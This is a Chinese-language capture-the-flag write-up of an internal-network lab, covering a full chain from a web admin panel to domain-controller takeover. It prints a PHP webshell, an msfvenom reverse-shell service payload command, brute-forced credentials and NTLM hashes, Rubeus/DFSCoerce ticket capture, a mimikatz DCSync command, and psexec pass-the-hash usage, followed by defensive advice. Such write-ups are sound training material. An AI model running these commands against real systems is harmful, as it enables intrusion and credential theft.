ichunqiu云境 - Delegation Writeup
字数 2308 2025-08-11 21:26:18

内网渗透实战:从Web到域控的完整攻击链分析

0x1 靶场环境概述

  • 靶场地址:https://yunjing.ichunqiu.com/ranking/summary?id=BzMFNFpvUDU
  • 环境特点:包含从Web到内网再到域的完整攻击路径
  • 难度级别:中等偏上,涉及多种内网渗透技术

0x2 初始渗透 - Web应用攻击

信息收集阶段

  1. 端口扫描:使用Nmap发现开放端口,重点关注80端口的HTTP服务
  2. 目录爆破:使用工具如Dirbuster或gobuster扫描网站目录

漏洞利用

  1. 发现后台:找到/admin目录
  2. 弱口令登录
    • 用户名:admin
    • 密码:123456
  3. 模板注入
    • 进入后台后访问模板页面
    • 编辑header.html文件
    • 插入PHP一句话木马:<?php system($_GET['cmd']); ?>
  4. 命令执行
    • 通过访问包含恶意代码的页面执行系统命令
    • 示例:http://target/path/to/header.php?cmd=whoami

0x03 内网入口点 - 172.22.4.36

初始立足点

  1. 反弹Shell:通过Web漏洞获取反向连接
  2. 系统信息收集
    • 检查当前用户权限
    • 枚举系统进程、服务、安装软件等

权限提升尝试

  1. SUID提权
    • 查找具有SUID位的可执行文件
    • 尝试利用stapbpf进行提权(失败)
  2. 发现flag01
    • 路径:/home/flag/flag01.txt
    • 内容包含重要提示:用户名WIN19\Adrian

内网探测

  1. 代理设置:建立SOCKS代理通道进入内网
  2. 端口扫描
    • 重点扫描445端口(SMB)
    • 发现三台关键主机:
      • 172.22.4.19 - fileserver.xiaorang.lab
      • 172.22.4.7 - DC01.xiaorang.lab(域控制器)
      • 172.22.4.45 - win19.xiaorang.lab

凭据爆破

  1. 使用rockyou.txt字典

    • 目标用户:WIN19\Adrian
    • 成功爆破出密码:babygirl1
    • 注意:密码已过期,需要修改

  2. 远程登录

    • 使用xfreerdp连接Win19主机:
    xfreerdp /u:Adrian /p:babygirl1 /v:172.22.4.45
    • 登录后修改密码

0x04 权限提升 - WIN19 (172.22.4.45)

当前状态分析

  • 仅有本地用户权限,无域凭据
  • 需要获取SYSTEM权限以提取机器账户凭据

提权路径

  1. 注册表漏洞利用

    • 发现Adrian用户对特定注册表项有完全控制权限
    • 关键注册表路径未明确,但通常涉及服务相关注册表

  2. 创建恶意服务

    • 使用msfvenom生成服务马:
    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe-service -o malicious.exe
    • 编写sam.bat脚本用于:
      • 修改注册表
      • 启用恶意服务

  3. 提取凭据

    • 执行sam.bat后获取以下文件:
      • SAM
      • SECURITY
      • SYSTEM
    • 使用工具如secretsdump.py提取凭据:
      • Administrator NTLM hash:
        ba21c629d9fd56aff10c3e826323e6ab
      • 机器账户NTLM hash:
        917234367460f3f2817aa4439f97e636

  4. 获取flag02

    • 使用机器账户收集域信息

0x05 域控接管 - DC01 (172.22.4.7)

信息分析

  1. Bloodhound分析
    • 发现WIN19和DC01都配置了非约束委派(Unconstrained Delegation)
    • 这是关键的攻击路径

攻击步骤

  1. 使用Administrator登录WIN19

    • 利用之前获取的凭据

  2. 部署Rubeus

    • 用于Kerberos票据操作的工具
    • 主要功能:请求、导入、导出、转换Kerberos票据

  3. DFSCoerce攻击

    • 强制触发DC01回连到WIN19
    • 获取DC01的TGT(票据授予票据)
    • 命令示例:
    Rubeus.exe monitor /interval:5 /filteruser:DC01$

    配合DFSCoerce触发

  4. 票据处理

    • 将Base64编码的TGT解码保存为DC01.kirbi文件
    • 可使用Rubeus的ptt功能将票据注入内存

  5. DCSync攻击

    • 使用获取的权限执行DCSync攻击
    • 提取域管理员凭据
    • 使用mimikatz示例:
    lsadump::dcsync /domain:xiaorang.lab /user:Administrator

  6. 获取flag04

    • 使用psexec等工具以域管理员身份执行命令

0x06 文件服务器接管 - Fileserver (172.22.4.19)

  1. 使用psexec登录

    • 利用之前获取的域管理员凭据
    • 命令示例:
    psexec.py xiaorang.lab/Administrator@172.22.4.19 -hashes aad3b435b51404eeaad3b435b51404ee:<NTLM_HASH>

  2. 获取flag03

0x07 攻击技术总结

关键技术点

  1. Web到内网的突破

    • 弱口令漏洞
    • 模板注入实现RCE

  2. 横向移动技术

    • SMB凭据爆破
    • 非约束委派利用
    • DFSCoerce强制认证

  3. 权限提升技术

    • 注册表服务滥用
    • SAM提取与哈希传递
    • DCSync攻击

  4. 域渗透技术

    • Kerberos票据操作
    • 黄金票据/白银票据概念
    • 非约束委派漏洞利用

防御建议

  1. Web应用层

    • 禁用弱口令
    • 限制模板编辑权限
    • 实施输入过滤

  2. 系统层

    • 定期更新密码
    • 限制注册表权限
    • 监控异常服务创建

  3. 域环境

    • 避免使用非约束委派
    • 实施LAPS(本地管理员密码解决方案)
    • 监控DCSync活动
    • 限制域管理员登录范围

附录:工具列表

  1. 侦察阶段

    • Nmap
    • Dirbuster/gobuster

  2. 漏洞利用

    • Metasploit
    • Msfvenom

  3. 内网渗透

    • Rubeus
    • Mimikatz
    • Impacket工具集(psexec, secretsdump等)
    • Bloodhound

  4. 代理工具

    • Chisel
    • EarthWorm
    • Neo-reGeorg

  5. 密码破解

    • Hashcat
    • John the Ripper
内网渗透实战:从Web到域控的完整攻击链分析 0x1 靶场环境概述 靶场地址:https://yunjing.ichunqiu.com/ranking/summary?id=BzMFNFpvUDU 环境特点:包含从Web到内网再到域的完整攻击路径 难度级别:中等偏上,涉及多种内网渗透技术 0x2 初始渗透 - Web应用攻击 信息收集阶段 端口扫描 :使用Nmap发现开放端口,重点关注80端口的HTTP服务 目录爆破 :使用工具如Dirbuster或gobuster扫描网站目录 漏洞利用 发现后台 :找到/admin目录 弱口令登录 : 用户名:admin 密码:123456 模板注入 : 进入后台后访问模板页面 编辑header.html文件 插入PHP一句话木马: <?php system($_GET['cmd']); ?> 命令执行 : 通过访问包含恶意代码的页面执行系统命令 示例: http://target/path/to/header.php?cmd=whoami 0x03 内网入口点 - 172.22.4.36 初始立足点 反弹Shell :通过Web漏洞获取反向连接 系统信息收集 : 检查当前用户权限 枚举系统进程、服务、安装软件等 权限提升尝试 SUID提权 : 查找具有SUID位的可执行文件 尝试利用stapbpf进行提权(失败) 发现flag01 : 路径:/home/flag/flag01.txt 内容包含重要提示:用户名 WIN19\Adrian 内网探测 代理设置 :建立SOCKS代理通道进入内网 端口扫描 : 重点扫描445端口(SMB) 发现三台关键主机: 172.22.4.19 - fileserver.xiaorang.lab 172.22.4.7 - DC01.xiaorang.lab(域控制器) 172.22.4.45 - win19.xiaorang.lab 凭据爆破 使用rockyou.txt字典 : 目标用户:WIN19\Adrian 成功爆破出密码:babygirl1 注意:密码已过期,需要修改 远程登录 : 使用xfreerdp连接Win19主机: 登录后修改密码 0x04 权限提升 - WIN19 (172.22.4.45) 当前状态分析 仅有本地用户权限,无域凭据 需要获取SYSTEM权限以提取机器账户凭据 提权路径 注册表漏洞利用 : 发现Adrian用户对特定注册表项有完全控制权限 关键注册表路径未明确,但通常涉及服务相关注册表 创建恶意服务 : 使用msfvenom生成服务马: 编写sam.bat脚本用于: 修改注册表 启用恶意服务 提取凭据 : 执行sam.bat后获取以下文件: SAM SECURITY SYSTEM 使用工具如secretsdump.py提取凭据: Administrator NTLM hash: ba21c629d9fd56aff10c3e826323e6ab 机器账户NTLM hash: 917234367460f3f2817aa4439f97e636 获取flag02 : 使用机器账户收集域信息 0x05 域控接管 - DC01 (172.22.4.7) 信息分析 Bloodhound分析 : 发现WIN19和DC01都配置了非约束委派(Unconstrained Delegation) 这是关键的攻击路径 攻击步骤 使用Administrator登录WIN19 : 利用之前获取的凭据 部署Rubeus : 用于Kerberos票据操作的工具 主要功能:请求、导入、导出、转换Kerberos票据 DFSCoerce攻击 : 强制触发DC01回连到WIN19 获取DC01的TGT(票据授予票据) 命令示例: 配合DFSCoerce触发 票据处理 : 将Base64编码的TGT解码保存为DC01.kirbi文件 可使用Rubeus的ptt功能将票据注入内存 DCSync攻击 : 使用获取的权限执行DCSync攻击 提取域管理员凭据 使用mimikatz示例: 获取flag04 : 使用psexec等工具以域管理员身份执行命令 0x06 文件服务器接管 - Fileserver (172.22.4.19) 使用psexec登录 : 利用之前获取的域管理员凭据 命令示例: 获取flag03 0x07 攻击技术总结 关键技术点 Web到内网的突破 : 弱口令漏洞 模板注入实现RCE 横向移动技术 : SMB凭据爆破 非约束委派利用 DFSCoerce强制认证 权限提升技术 : 注册表服务滥用 SAM提取与哈希传递 DCSync攻击 域渗透技术 : Kerberos票据操作 黄金票据/白银票据概念 非约束委派漏洞利用 防御建议 Web应用层 : 禁用弱口令 限制模板编辑权限 实施输入过滤 系统层 : 定期更新密码 限制注册表权限 监控异常服务创建 域环境 : 避免使用非约束委派 实施LAPS(本地管理员密码解决方案) 监控DCSync活动 限制域管理员登录范围 附录:工具列表 侦察阶段 : Nmap Dirbuster/gobuster 漏洞利用 : Metasploit Msfvenom 内网渗透 : Rubeus Mimikatz Impacket工具集(psexec, secretsdump等) Bloodhound 代理工具 : Chisel EarthWorm Neo-reGeorg 密码破解 : Hashcat John the Ripper